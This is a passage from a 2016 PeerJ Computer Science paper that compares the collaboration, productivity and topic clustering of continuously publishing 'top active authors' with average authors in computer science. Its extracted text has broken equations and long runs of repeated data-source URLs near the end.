among authors with at least one publication in that window around 1%. Smaller window size will lead to a higher percentage than 1% while larger window size will lead to a lower percentage. For clarity, we show an example of top active author versus non-top active author in the active window [1988,1995] in Fig. 2, where their annual number of publications during that period is plotted. With this definition, it is observed that the active window size required to be counted as a top active author is different for each starting year. In fact, this active window size is growing steadily over the years, as shown in Fig. 3. This certainly correlates well with our impression that the top authors are becoming more and more active. The number of years required to become a top active author starting from 1996 is around 11, which is a little less than that found in Ioannidis, Boyack & Klavans (2014). This is not too surprising considering the research field and dataset studied are both different. But the result is in the same ball park. Wu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.41 5/21 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.41 Figure 2 Example of top active author versus non-top active author in the active window [1988,1995]. Figure 3 Change of active window size. Comparison on collaboration We first compare the collaboration patterns of top active authors with that of average authors. Top active authors is the author set including all top active authors in an active window, while “average authors” is the author set including any author with at least one publication in an active window. So average authors is a superset of top active authors. We take the active year window [1988,1995] for comparison. We compare the nature and extent of collaboration, such as the size of coauthors set, collaboration strength and team connectivity, and then the productivity. We will show the brief comparison results across different active windows later. One important measure for the extent of collaboration of an author, obviously, is the size of the coauthors set. Figure 4 shows the average number of coauthors per author for top active authors and average authors on an annual basis. Here the coauthors include top active coauthors and non-top active coauthors. The figure shows that top active authors Wu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.41 6/21 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.41 Figure 4 Comparison of coauthors set size between top active authors and average authors. generally have more coauthors than average authors. Moreover, the top active authors also have a significantly higher increase rate of coauthors, although more collaboration is the trend for the whole community (O’Brien, 2012; Wuchty, Jones & Uzzi, 2007). A likely reason for the much higher number of coauthors for top active authors is directly due to “team science” and the growth in team size. As the collaboration pattern in a team is often hierarchical, and the top active authors are more likely at the root of the hierarchy, they would naturally have more collaborators and benefit from growth of team sizes. If we assumed the coauthor network is built by preferential attachment (Lee et al., 2010), we would reach the same conclusion for top active authors. To further understand the collaboration pattern by top active authors, we also show the coauthors set size of the same set of top active authors during their pre top-active period and post top-active period for ten years in Fig. 4. It is clear that even before and after their top-active period, top active authors tend to have more coauthors. The difference between top active authors and average authors in the ten years before their top-active period is not so much as that in later periods. But there still exists slight advantage to top active authors. This indicates that in order to become top active authors, it is important for authors to build and expand their research teams in the very beginning. The further growth of the number of coauthors in the post top-active window is likely due to the reputation and connections they accumulated during their top-active period. In a social network, while the number of friends may show the size of one’s social connections, the length of the friendship one keeps with others can better reflect the extent of one’s influence in his social network. Similarly, in the study of research collaboration, we can also use the collaboration length between one and his coauthors to represent one’s influence in his research community. Again we compare top active authors with average authors using the active window [1988,1995]. Figure 5A shows the distribution of collaboration length in the 8-year active window for top active authors and average authors. We observe that for both top active authors and average authors, more than half of the collaboration links exist for only one year, which shows the dominance of Wu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.41 7/21 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.41 Figure 5 Comparison of collaboration length between top active authors and average authors. (A) is the distribution of collaboration length. (B) is the distribution of one-year link. Table 2 Analysis on connected components. Statistical measurement Top active author Average author #nodes in network 2,317 212,527 #links in network 5,677 410,606 #connected components 61 25,201 #nodes in giant component 2,170 135,391 short-term research teams. However, top active authors are more likely to have longer collaboration relationship with others. This indicates that although top active authors have a rapid expansion rate of coauthors, there still exist some stable collaboration links. For the transient links which last for only one year, the distribution of the year in which the one-year collaboration happens is plotted in Fig. 5B. While it is almost uniformly distributed in the 8 years for top active authors, it is left skewed for average authors. Top active authors keep a regular proportion of transient collaboration links, while the average authors have more short-term collaboration links in recent years, which may be the result of rapid increase of paper publishing over years. Next, we analyze the structure of the coauthor networks built in the 8-year window by top active authors and average authors respectively. Here the coauthor network of top active authors contains the collaboration between top active authors only and the average author coauthor network consists of all the authors with publications in the specific time window. For simplicity, we have removed authors with no coauthors (single nodes only) in the two networks. The result is shown in Table 2, where we focus on the analysis of connected components in the two networks. The number of connected components is a lower bound to the estimated number of clusters in the coauthor network. It reflects the connectivity in the network as a whole. As shown by Table 2, top active authors are more connected with each other while for average authors, small teams are more popular. Wu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.41 8/21 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.41 Figure 6 Comparison of productivity for top active authors and average authors. (A) is the comparison of IP. (B) is the comparison of CP. Comparison on productivity Besides the collaboration patterns, a more direct assessment of an author’s activity in the community is productivity, which is often reflected by the annual publication rate of an author. Before going to the detailed discussion of productivity, we define two notations first: individual productivity (IP) and community productivity (CP). IP is the annual number of claimed papers per author. Thus IP is incremented for an author every time his name appears in a paper. CP, on the other hand, is based on the fractional contribution of each coauthor towards a paper (equal division assumed). CP counts each paper only once, while IP counts each paper n times when there are n coauthors. Figure 6 shows the comparison of IP and CP for top active authors and average authors. Similar to the comparison of coauthors, we also include productivity behaviors in the ten years before and after the top-active period. For the comparison of IP, we can see that IP almost doubles in the 28 years for average authors, while it is much more than doubled for top active authors. This can be partially explained by the different coauthors set sizes of top active authors and average authors. Different from CP, the contribution of coauthors can help increase one’s IP. We can see in Fig. 4 that while the annual number of coauthors for average authors increases from 1 to 4 in the 28 years, it increases from 2 to 11 for top active authors in the same period. Such a rapid expansion of collaboration thus inevitably leads to more productivity for top active authors. For CP, there is a slight decreasing trend for average authors, whereas for top active authors, the trend is increasing over the 28 years. This shows that although the top active authors are consistently increasing their productivity, whether measured by IP or CP, the productivity (CP) of the average authors are actually decreasing. This phenomenon was also observed and discussed in the context of team science (Wuchty, Jones & Uzzi, 2007). Comparison across different active windows Now we show the brief comparison results between top active authors and average authors across different active windows. As previously, we do the comparison on collaboration and productivity. For collaboration, the average annual number of coauthors per author Wu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.41 9/21 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.41 Figure 7 Comparison of coauthors set size between top active authors and average authors across different active windows. in each active window starting from different years is plotted in Fig. 7. The calculation is as follows: for each targeted author, we count his number of active years and number of distinct coauthors in one active window (That means if a coauthor collaborates multiple times with the targeted author in an active window, we only count him once.). With the two numbers, we obtain his annual number of coauthors in the active window. Then we do average on the targeted author set, and get the comparison result between top active authors and average authors. From Fig. 7 we see that in the earlier windows, there is not much difference between top active authors and average authors, they have coauthors with almost the same scale. However later, top active authors show great advantage over average authors in attracting coauthors. We see that in the last active window starting from 1998, the average annual number of coauthors per author is almost doubled for top active authors than average authors. For productivity, we also do the comparison on IP and CP. The comparison result is shown in Fig. 8, where we plot the average annual number of papers per author in each active window starting from different years. The calculation is similar to the previous calculation for coauthors. We see that for IP, while average authors behave consistently over different active windows, top active authors show a rapidly increasing trend. For CP, while average authors show a decreasing tendency, top active authors are still able to achieve increasing productivity, although the increase rate is not that large when compared to the IP case. In summary, the comparison results between top active authors and average authors across different active windows are consistent with our previous findings in one active window. The analysis and comparison of top active authors and average authors, on both collaboration and productivity, give us further insights into the trend of team research. Top active authors are able to achieve more sustained research activity, much higher level of research output, and accelerated growth in research output. This may be partially explained by their ability to build research teams, as well as to form extensive research Wu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.41 10/21 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.41 Figure 8 Comparison of productivity for top active authors and average authors across different active windows. (A) is the comparison of IP. (B) is the comparison of CP. collaboration with a broader range of other authors including top active authors. In this regard, the top active authors might be treated as the core of the research community. Collaboration among top active authors From our analysis above, top active authors can be considered as the core of their academic community. Their collaboration and communication plays a significant role in knowledge diffusion and research development in academia. And the evolution of their collaboration patterns also reflect the research trend in the whole community. Therefore, we take an analysis on the collaborations among those top active authors in this section. For the study of top active author collaboration, two important aspects of the collabo- ration network is its topology and tie strength. While network topology demonstrates the way top active authors link with each other, tie strength indicates the closeness of the linked top active authors. Our focus for this study is thus the relationship between the tie strength and network topology of the coauthor network of top active authors. Previous studies on this have shown different results. Granovetter (1973) and Onnela et al. (2007) have already shown that in ordinary social networks, members usually communicate more frequently with other ones in the same community. Therefore in the communication network built by community members, if we define the tie strength in the network by their communication frequency, we can find that stronger ties exist mostly inside a community, while ties between different communities are usually weaker. However, in coauthor networks, it is shown in Pan & Saramäki (2012) and Ke & Ahn (2014) that on the contrary, the tie strength is usually much weaker among authors in the same community than authors in different communities. Then as the core of the academic community, for top active authors, what will be the case in their coauthor network? Before we take a detailed analysis on this, we first give formal definitions on the measurement of tie strength between coauthors and network topology. Following the practice of Newman (2001), we define tie strength, i.e., collaboration link weight between Wu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.41 11/21 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.41 author i and one of his coauthor j by wij =  p 1 np − 1 , (1) where p is the set of papers that author i and j have coauthored, and np is the number of authors of paper p. Therefore, for the coauthor network of top active authors, wij is calculated based on all the coauthored papers by two top active authors in an active window. Note that the definition of the collaboration link weight here considers not only the collaboration length between two top active coauthors, but also their collaboration frequency. For the network topology, we focus on the measurement of the similarity of two coauthors’ neighborhood, which may reflect whether two coauthors are in the same community or not. So we define the neighborhood similarity of author i and author j by Oij = nij di − 1 + dj − 1 − nij , (2) where di is the node degree of author i, dj is the node degree of author j, and nij is the number of common neighbors of author i and author j in the coauthor network (Onnela et al., 2007) of top active authors. Thus Oij reflects the link overlap of two top active coauthors. After the introduction of the above definitions, we then do analysis on the coauthor network of top active authors. We take two sets of top active authors in the active windows [1988,1995] and [1998,2009] respectively, and study the evolution by comparing the difference between them. As with the previous analysis, we build the two coauthor networks based on the existence of collaboration links between top active authors in each window respectively. Note, for these two networks only the top active authors in the respective time windows are included. The top active authors without any coauthors (hence singleton nodes) are removed, and the top active coauthor pairs with no other neighbors (in which case the denominator for Oij is 0) are also removed. Figure 9 shows the relationship between the link overlap and tie strength of the two coauthor networks respectively. We see that the coauthor network of top active authors presents a pattern in between the patterns in ordinary social network and general coauthor network respectively. On one hand, a similar trend as the ordinary social network is displayed (right hand side part of Figs. 9A and 9B). For links with large weight, the link overlap is also relatively large. This shows the general trend when doing research that many authors will collaborate when they study similar topics. On the other hand, there are author pairs in the same community but seldom collaborating (left hand side of Figs. 9A and 9B). Those authors might be research leaders working on the same specific topic. Each of them has many coauthors in the same area, but they do not collaborate often directly, since they need to compete with each other in order to get resources and support for their own research. Therefore, although they might have large overlap of coauthors, they do not collaborate Wu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.41 12/21 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.41 Figure 9 Relationship between link overlap and link weight in the two active windows. We use log- arithmic binning for wij and choose the median value of Oij in a bin. (A) is the result in [1988,1995] window. (B) is the result in [1998,2009] window. Figure 10 The relative size of the remaining giant component as a function of the fraction of removed links in the two active windows. (A) is the result in [1988,1995] window. (B) is the result in [1998,2009] window. much directly. There are also author pairs with very small link overlap but relatively large link weight (the middle part of Figs. 9A and 9B). This indicates the collaboration between different communities, thus the interdisciplinary research trend in Computer Science. To confirm our conclusions above, we also do analysis on the giant component of each coauthor network of top active authors. We remove links one by one from the giant component based on the link weight, either in decreasing order or increasing order, and keep track of the size of the remaining giant component as a function of the fraction of removed links. The result is shown in Fig. 10. We see that in general, the giant component shrinks faster when the stronger links are removed first, which indicates that links are stronger between different communities. This phenomenon is similar to the case in general coauthor network, but they have quite different implications. For the general coauthor network, the weaker connection inside a community is due to the junior students in a research group (Pan & Saramäki, 2012), while for the coauthor network of top active authors, since each node represents a senior researcher, the relatively weaker connection Wu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.41 13/21 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.41 Figure 11 Comparison of clustering results in the two active windows. (A) is the result in [1988,1995] window. (B) is the result in [1998,2009] window. inside a community is due to their competition in the same topic, and the stronger connection between different communities is due to the collaboration in interdisciplinary topics. Besides, by comparing Fig. 10A with Fig. 10B, we find that the gap between the two shrinking curves are becoming larger, and the giant component is also becoming more resistent to the removal of links. In Fig. 10B, most of the nodes still exist in the giant component even when half of the links are removed. The larger gap implies more strong connections and less weak connections between communities, which again shows the interdisciplinary research trend. The better resistance to link removal means that inside the same community, there are more links with the strongest/weakest connections. It indicates on one hand the collaboration of senior authors in the same topics, on the other hand the fierce competition among research leaders on similar topics. Topic trend based on top active author collaboration Based on the leadership status of top active authors in their academic community, we can also get a sense of what have been the hot topics in the community, by observing the evolution of the research topics the top active authors work on. For this study, we still take the two sets of top active authors in the active windows [1988,1995] and [1998,2009] respectively, and compare the differences between them. As with the previous analysis, we first build the two coauthor networks based on the existence of collaboration links between top active authors in each window respectively, and remove the top active authors without any coauthors, as they will not be part of any clusters anyway. We then apply the Clauset–Newman–Moore algorithm (Clauset, Newman & Moore, 2004) to do clustering for the two coauthor networks. This algorithm is based on the optimization of the network modularity, which measures when the clustering is a good one, in the sense that there are many edges within clusters and only a few between them. Figure 11 shows the clustering result for the two windows. Different clusters are put in different grids, with blue nodes representing top active authors in clusters. The grey lines between nodes in different grids represent the collaboration relationships Wu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.41 14/21 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.41 Figure 12 Major subdomain of top active authors in the two active windows. (A) is the result in [1988,1995] window. (B) is the result in [1998,2009] window. among different clusters. We can see that in the earlier window, the clusters are more fragmented. The smallest cluster contains only two authors (the minimum possible size). The connections (represented by the number of links) between different clusters are not strong. Our interpretation is that in the earlier years, researchers tended to work more in isolation or with small scale (e.g., thesis mentor-mentee type of ) collaboration, with little cross teams collaboration. The period [1988,1995] is also before the advent of WWW, which might be attributed as an important factor of increased research collaboration. In the second window [1998,2009], however, four largest clusters with similar sizes emerged and seemed to dominate all the other clusters in size. Moreover, many more collaboration links exist between different clusters. This indicates that Computer Science as a research field had become more interdisciplinary (at least within its field) with much more extensive collaboration among its researchers, which has been shown in previous analysis. Since our clustering is conducted based on the existence of collaboration links, and through the publications of each top active author we extract their major research subdomains, we can visualize research as the mixing (or collaboration) of ideas from different research subdomains. For the years in the first window of time, a few research subdomains are the focus of research then, and many other research ideas were emerging and small research subdomains were just being formed. This is manifested by the large number of research clusters, the minimal collaboration between these clusters, and each cluster hosting a relatively homogeneous group of researchers. This is illustrated in Fig. 12A, where each node still represents a top active author, with a color representing the major research subdomain of that author (If an author publishes in multiple subdomains, then the major subdomain is the one most of that author’s publications during the top active period belong to.). By the second window of years, a large number of top active authors belong to the four major clusters with heavy intra-cluster collaboration, with a relatively small fraction of top active authors still working in smaller clusters. Furthermore, Wu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.41 15/21 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.41 the four clusters are no longer so homogeneous, with a more mixed set of colors, as shown in Fig. 12B. Again, each node corresponds to a top active author, with a color representing the major subdomain that top active author works in, during the respective time window. By now, you must be curious about what the large clusters in each of these two windows are. We show the answers in Figs. 13A and 13B for these two time windows. For each cluster, we show its composition in terms of the distribution of its researchers from the 24 subdomains of our metadata.3 For the earlier time window [1988,1995], the top three 3 We use subdomain name “Computer Science” to represent papers belonging to Computer Science, but not catego- rized into any subdomain. clusters are made up of mostly (1) “Algorithms and Theory” people, (2) “Databases” people, and (3) “Programming Language” people respectively. By the second time window, the top four dominating clusters are each hosting a more mixed set of top active authors, with the dominating subdomains being, respectively (1) “Algorithms and Theory” and a set of application or technology areas, including “Networks and Communications”, “Security and Privacy”, “Computer vision”, “Graphics” etc. (2) “Databases” and “Artificial Intelligence” and some application or technology areas, including “Networks and Communications”, “Human Computer Interactions”, “Data Mining” etc. (3) “Hardware and Architecture”, “Software Engineering” and “Distributed and Parallel Computing”, which may all be considered to be related to computing systems. (4) “Artificial Intelligence”, “Machine Learning and Pattern Recognition”, “Multimedia”, “Natural Language and Speech”, and “Networks and Communications”, which may all be considered to belong to multimedia technology, applications and systems. These large clusters seem to map to the hot research areas and focus in Computer Science during those time periods. From Fig. 13B, since there are more mixing of different subdomains in forming large clusters, we can also get a sense which subdomains tend to mix (collaborate) with others, and which subdomains tend to mix with each other. It seems “Networks and Communications”, perhaps playing an infrastructure or glue role, tend to mix with others the most. “Artificial Intelligence” seems to mix mostly with “Machine Learning” and “Databases”, which perhaps represent the “thinking” and “memory” aspects of artificial intelligence. Finally, it is also clear that the trend is for more and more interdisciplinary research, rather than for people in each subdomain working alone, which corroborates with previous findings. DISCUSSION Our study is only based on publication and coauthorship data, so it is not possible to make meaningful assessment of research impact. A useful future direction is to incorporate the study of the research impact, based on whatever reliable measures for that, of top active authors and non-top active authors. This will help us further understand how good research results are achieved in the era of team research. Nonetheless, the insights from our study should still be helpful to policy makers in academia. For example, different Wu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.41 16/21 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.41 Figure 13 Subdomain distribution in the two active windows. (A) is the result in [1988,1995] window. (B) is the result in [1998,2009] window. Wu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.41 17/21 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.41 evaluation frameworks may be used for different types of authors to get proper assessment of the different roles in team research. By serving as the core of the community, and as leaders of research teams, the top active authors tend to easily build up his/her academic output quantitatively, compared to less active authors and newcomers. It is necessary to take into account of the different roles, to help better assess the individual contributions, and give proper recognition. Besides, considering the evolution of different research topics in the community, we might have some mainstream topics which attract much attention from the community, just as the large clusters observed above. However, we may also have some topics which are relatively cold and studied only by a small group of authors. It is natural that funding institutions might tend to support research proposals on mainstream topics. However, the study on some cold topics should also not be ignored. They need to find a balance between the research topics studied by different scales of authors. And it is the governors’ responsibility to make efficient resource allocations on different research topics based on their evolution patterns. The evolution of research topics and the clustering of these topics may also have some interesting implications. On the one hand, it is encouraging to see more and more collaboration between authors leading to increasingly more interdisciplinary research, which, arguably leads to better research. On the other hand, it may also be the manifestation of the tendency by researcher to pursue hot topics, which is a less risky approach in a very competitive research environment. The policy makers may consider the proper balance between the convergence and diversity of researchers. Nowadays, there are plenty of research funding encouraging research collaboration, not only between departments within a university, but across universities in a region, and also internationally, which is consistent with the trend of increased collaboration we observe. The nature of inter-team collaboration is worth further studies. On the one hand, it is possible that collaboration is mostly bringing together researchers of different backgrounds so they will complement each other. On the other hand, it is also possible that collaboration is bringing together teams working on the same topics (forming larger teams), which may reduce competition. The situation is likely the combination of both cases. An in-depth study of the trend and effectiveness of such collaboration behavior will also help funding policy makers. Despite the insights we get from our findings, we understand that there also exist some limitations in our dataset. As mentioned by Orduña-Malea et al. (2014), MAS has incomplete indexation of papers in recent years, which may result in a relatively smaller coverage of MAS than other popular bibliographic databases like ISI Web of Science and Scopus. But our focus in this paper is only the Computer Science field, not the general science research. And we only used data before 2010, the year when the incomplete indexation problem began to appear in MAS dataset (Orduña-Malea et al., 2014). With these restrictions, we think the data from MAS is good enough. An important reason for using the MAS data is that it comes with tagging of the papers by subdomains, which allows us to tag authors as well. This is a feature necessary for us to study the trend of Wu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.41 18/21 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.41 research topic clustering. The author name ambiguity problem is still a challenge to us. The MAS data has gone through some editing to remove some name ambiguity problems. Without involving authors to help correct ambiguity problems (as implemented by Google Scholar), the problem is not eliminated. However, in our study, since most analysis is at the statistical average level on different author sets, we believe the impact is not that severe. Besides, for the topic trend study, since only major subdomains are considered, this will also remove some bias caused by duplicate records of authors. CONCLUSION In this paper, we took an analysis on a new set of authors, i.e., top active authors, who have uninterrupted and continuous presence in the scientific literature over a period of time. Thus top active authors may represent the most active researchers and serve as the core workforce in the community. We analyzed and compared the collaboration patterns and productivity of top active authors versus average authors in the Computer Science field. Results show that top active authors are serving as the core of the research community and the study of top active authors can help us have a better understanding of the general trend of team research in the community. We also studied the research topic trends by analyzing the evolution of the coauthor network structure of top active authors and the detailed research topics the top active authors work on. Results indicate that Computer Science, as a research field, is showing an increasing tendency for interdisciplinary research in the community. Our conclusions not only show the general trends in doing research in the academic community, but also provides insights for policy researchers and policy makers in academia to develop better evaluation methods and doing more efficient resource management in system. Our analysis is just an initial attempt for the understanding and visualization of the general trend in the academic ecosystem. For future work, analysis on datasets in other research fields can be conducted and more measurements besides the ones we focused on in this paper can also be proposed. Theoretical analysis and modeling of the authors’ team research patterns are of interest as well. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Author Contributions • Yan Wu conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. Wu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.41 19/21 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.41 • Srinivasan Venkatramanan and Dah Ming Chiu conceived and designed the experi- ments, wrote the paper, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: The data we used belongs to Microsoft Academic Search and is available upon request from Microsoft: http://datamarket.azure.com/dataset/mrc/microsoftacademic. Another project that made the data available (upon request) is at: http://cse.iitkgp.ac.in/resgrp/ cnerg/. The latter source of data has been pre-processed for ease of use. REFERENCES Brookshear JG. 2011. Computer science: an overview. 11th edition. Addison-Wesley. 10 pp. Clauset A, Newman ME, Moore C. 2004. Finding community structure in very large networks. Physical Review E 70(6):066111 DOI 10.1103/PhysRevE.70.066111. Gingras Y, Lariviere V, Macaluso B, Robitaille J-P. 2008. The effects of aging on researchers’ publication and citation patterns. PLoS ONE 3(12):e4048 DOI 10.1371/journal.pone.0004048. Granovetter MS. 1973. The strength of weak ties. American Journal of Sociology 78(6):1360–1380 DOI 10.1086/225469. Huang J, Zhuang Z, Li J, Giles CL. 2008. Collaboration over time: characterizing and modeling network evolution. In: Proceedings of the 2008 international conference on web search and data mining. ACM, 107–116. Ioannidis JP, Boyack KW, Klavans R. 2014. Estimates of the continuously publishing core in the scientific workforce. PLoS ONE 9(7):e101698 DOI 10.1371/journal.pone.0101698. Katz J. 1994. Geographical proximity and scientific collaboration. Scientometrics 31(1):31–43 DOI 10.1007/BF02018100. Katz JS, Martin BR. 1997. What is research collaboration? Research Policy 26(1):1–18 DOI 10.1016/S0048-7333(96)00917-1. Ke Q, Ahn Y-Y. 2014. Tie strength distribution in scientific collaboration networks. Physical Review E 90(3):032804 DOI 10.1103/PhysRevE.90.032804. Kunegis J, Fay D, Bauckhage C. 2010. Network growth and the spectral evolution model. In: Proceedings of the 19th ACM international conference on Information and knowledge management. ACM, 739–748. Lee S, Bozeman B. 2005. The impact of research collaboration on scientific productivity. Social Studies of Science 35(5):673–702 DOI 10.1177/0306312705052359. Lee D, Goh K-I, Kahng B, Kim D. 2010. Complete trails of coauthorship network evolution. Physical Review E 82(2):026112. Melin G. 2000. Pragmatism and self-organization: research collaboration on the individual level. Research Policy 29(1):31–40 DOI 10.1016/S0048-7333(99)00031-1. Newman ME. 2001. The structure of scientific collaboration networks. Proceedings of the National Academy of Sciences of the United States of America 98(2):404–409 DOI 10.1073/pnas.98.2.404. O’Brien TL. 2012. Change in academic coauthorship, 1953–2003. Science, Technology & Human Values 37(3):210–234 DOI 10.1177/0162243911406744. Wu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.41 20/21 https://peerj.com/computer-science/ http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://dx.doi.org/10.1103/PhysRevE.70.066111 http://dx.doi.org/10.1371/journal.pone.0004048 http://dx.doi.org/10.1086/225469 http://dx.doi.org/10.1371/journal.pone.0101698 http://dx.doi.org/10.1007/BF02018100 http://dx.doi.org/10.1016/S0048-7333(96)00917-1 http://dx.doi.org/10.1103/PhysRevE.90.032804 http://dx.doi.org/10.1177/0306312705052359 http://dx.doi.org/10.1016/S0048-7333(99)00031-1 http://dx.doi.org/10.1073/pnas.98.2.404 http://dx.doi.org/10.1177/0162243911406744 http://dx.doi.org/10.7717/peerj-cs.41 Onnela J-P, Saramäki J, Hyvönen J, Szabó G, Lazer D, Kaski K, Kertész J, Barabási A-L. 2007. Structure and tie strengths in mobile communication networks. Proceedings of the National Academy of Sciences of the United States of America 104(18):7332–7336 DOI 10.1073/pnas.0610245104. Orduña-Malea E, Martı́n-Martı́n A, M Ayllon J, Delgado Lopez-Cozar E. 2014. The silent fading of an academic search engine: the case of microsoft academic search. Online Information Review 38(7):936–953 DOI 10.1108/OIR-07-2014-0169. Pan RK, Saramäki J. 2012. The strength of strong ties in scientific collaboration networks. Europhysics Letters 97(1):18007 DOI 10.1209/0295-5075/97/18007. Petersen AM, Riccaboni M, 